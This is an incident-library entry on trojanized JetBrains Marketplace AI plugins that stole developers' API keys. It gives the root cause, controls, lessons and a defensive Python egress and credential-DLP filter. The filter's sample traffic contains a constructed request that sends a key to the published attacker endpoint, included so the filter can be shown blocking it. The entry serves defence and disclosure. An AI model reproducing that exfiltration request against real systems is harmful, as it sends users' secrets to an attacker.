Malicious JetBrains Marketplace plugins steal AI API keys
Real-world incident · 16 Jun 2026 · Model / Package Supply Chain
Researchers reported at least 15 trojanized JetBrains Marketplace plugins posing as AI coding assistants that silently exfiltrated the OpenAI/DeepSeek/SiliconFlow API keys developers pasted into them — ~70,000 installs, with stolen keys allegedly resold to paying users.
Root cause — why it happened
Developers installed plugins from the JetBrains Marketplace that advertised themselves as AI coding helpers built on tools like DeepSeek and OpenAI. The plugins worked exactly as promised — but they were also booby-trapped. When a developer pasted in their AI provider key so the plugin could call the AI, the plugin quietly copied that key to a stranger's server. The danger wasn't a poisoned AI model; it was that a tool the IDE trusted was handed a real secret and abused that trust, with no warning shown to the user.
Risks this case illustrates
Named in the standard (OWASP/ATLAS/NIST) lens.
How it unfolded
An attacker publishes a working AI plugin to the Marketplace
Someone uploads a plugin to the JetBrains Marketplace that looks like a genuinely useful AI coding assistant — chat, commit-message generation, code review. It is published under an ordinary-looking vendor account, and it really does work.
Name: DeepSeek AI Assist
Vendor: <one of seven publisher accounts>
Features: AI chat · commit-message gen · code review · bug finding · unit tests
Built on: DeepSeek / OpenAI / SiliconFlow
Installs: ~27,727 (CodeGPT AI Assistant: ~25,571; ~70k across the set)
# Works exactly as advertised. The malicious fragment is buried in working code.
Controls & guardrails — what would have stopped it
The cleanest fix is to never hand a long-lived secret to a third-party plugin at all — log in to the AI provider through a proper sign-in flow that gives the plugin a short-lived, revocable token instead of your master key. Failing that, two things would have caught it: vetting plugins like real software before installing (not trusting the listing), and watching the developer machine so a coding tool sending a key to an unrelated server raises an alarm. And if a key did leak, rotating it immediately is what actually shuts the attacker out.
- MCP/plugin pinning, manifest hashing & re-review
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
- Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
- Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
- Runtime monitoring & anomaly detection (addresses Sensitive Data Leakage)
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
- Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.
- Governance: risk assessment, red-teaming & incident response (addresses Supply-Chain Compromise)
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
Lessons
- Marketplace presence and a working feature set are not provenance — a fully-functional AI plugin can hide a small credential-stealing fragment that survives manual review.
- The most valuable thing an AI dev tool can steal is often the developer's own provider API key — voluntarily pasted in, long-lived, and immediately monetisable via reuse/resale (LLMjacking).
- Third-party IDE plugins run with the developer's privileges and open network egress; an egress boundary (allowlist + credential DLP) on the dev environment is the practical chokepoint for exfiltration.
- Keep secrets out of plugin custody: brokered, short-lived, per-tool tokens (OAuth) mean a future trojan has no long-lived key to exfiltrate in the first place.
- Once a long-lived key has left the machine, only rotation neutralises it — treat any secret entered into an affected plugin as compromised, and audit provider billing for unexpected usage.
Proposals & gaps this case surfaced
Non-destructive suggestions for the library — proposed, not adopted.
Third-party developer tools (IDE plugins, MCP servers) must not store or transmit long-lived provider API keys. Issue short-lived, scoped, revocable tokens via a broker/OAuth flow, and gate any first-time outbound transmission of secret-shaped data behind an explicit consent prompt — so a trojanized tool has no long-lived credential to exfiltrate and any attempt is visible.
This case shows a gap: we usually worry about poisoned AI models or tools that trick the AI. Here the trick was on the human — a trusted tool simply collected the secret the developer typed in, with no warning. We should treat 'a tool handles your credential' as its own risk, with rules about how plugins are allowed to hold and send secrets.
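One way to build the egress chokepoint described in the lessons and in the proposal above (a provider-host allowlist, credential DLP on outbound headers and bodies, and a consent prompt on a plugin's first secret-bearing call to a host), written as an added Python example; it is not code from the library or from any of the cited sources. The allowlist hosts, the `sk-` key shape and the sample traffic are assumptions; the exfiltration destination and path are the IOC the sources publish.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit

# Secret-shaped value detector: "sk-" is the prefix OpenAI and DeepSeek keys share;
# the 20-character floor is an assumption chosen to skip short identifiers.
SECRET_RE = re.compile(r"\bsk-[A-Za-z0-9_\-]{20,}")
# Hosts a provider key may legitimately reach (assumed allowlist for this example).
ALLOWED_HOSTS = frozenset({"api.openai.com", "api.deepseek.com", "api.siliconflow.cn"})

# plugin: the IDE plugin that issued the request, as attributed by the local egress proxy.
Request = namedtuple("Request", "plugin url headers body")
# action is one of allow / prompt / block / review; secrets holds redacted fingerprints only.
Verdict = namedtuple("Verdict", "action reason host secrets")

def fingerprint(secret):
    # Keep enough of a secret to correlate findings without ever recording the whole value.
    return secret[:6] + "..." + secret[-4:]

def find_secrets(req):
    haystack = "\n".join(f"{k}: {v}" for k, v in req.headers.items()) + "\n" + req.body
    return set(SECRET_RE.findall(haystack))

def inspect(req, consented):
    host = (urlsplit(req.url).hostname or "").lower()
    secrets = tuple(sorted(fingerprint(s) for s in find_secrets(req)))
    if secrets and host not in ALLOWED_HOSTS:   # credential DLP: block and alert
        return Verdict("block", "secret-shaped data sent to a non-allowlisted host", host, secrets)
    if host not in ALLOWED_HOSTS:               # plain allowlist miss: lower severity
        return Verdict("review", "egress to a host outside the provider allowlist", host, ())
    if secrets and (req.plugin, host) not in consented:
        consented.add((req.plugin, host))       # the user's answer to the prompt is recorded here
        return Verdict("prompt", "first secret-bearing call by this plugin to this host", host, secrets)
    return Verdict("allow", "provider call to an allowlisted host", host, secrets)

# Constructed sample traffic from one plugin: two legitimate completion calls around an
# exfiltration POST. The exfil host and path are the IOC published in the case.
KEY = "sk-EXAMPLEKEY0123456789abcdefghij"   # constructed, not a real key
SAMPLE_TRAFFIC = [
    Request("DeepSeek AI Assist", "https://api.deepseek.com/chat/completions",
            {"Authorization": f"Bearer {KEY}"}, '{"model": "deepseek-chat"}'),
    Request("DeepSeek AI Assist", "http://39.107.60.51/api/software/key",
            {"Content-Type": "application/json"}, f'{{"key": "{KEY}"}}'),
    Request("DeepSeek AI Assist", "https://api.deepseek.com/chat/completions",
            {"Authorization": f"Bearer {KEY}"}, '{"model": "deepseek-chat"}'),
]

def triage(traffic=SAMPLE_TRAFFIC):
    consented = set()   # consent state carried across requests, in log order
    return [inspect(r, consented) for r in traffic]
```

Run in order, the first provider call is held for a consent prompt, the POST to the attacker host is blocked with only a key fingerprint in the verdict, and the repeat provider call passes without a prompt.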
Sources
- Multiple JetBrains IDE plugins caught stealing AI keys — Aikido Security (primary research)
- Malicious JetBrains Marketplace plugins steal AI API keys from developers — BleepingComputer
- Malicious JetBrains Plugins Steal AI API Keys as Chrome Extensions Capture Chatbot Chats — The Hacker News
- Fifteen JetBrains Marketplace Plugins Steal API Keys — Infosecurity Magazine
- Malicious JetBrains Plugins Steal AI API Keys from Developers — Aviatrix Threat Research Center
- Aikido Security — Multiple JetBrains IDE plugins caught stealing AI keys (primary research): campaign scope, install counts, IOC (39.107.60[.]51 /api/software/key), and the paid-tier resale inference.
- BleepingComputer — Malicious JetBrains Marketplace plugins steal AI API keys from developers: independent reporting; JetBrains had not responded at publication, and some plugins were reportedly still available.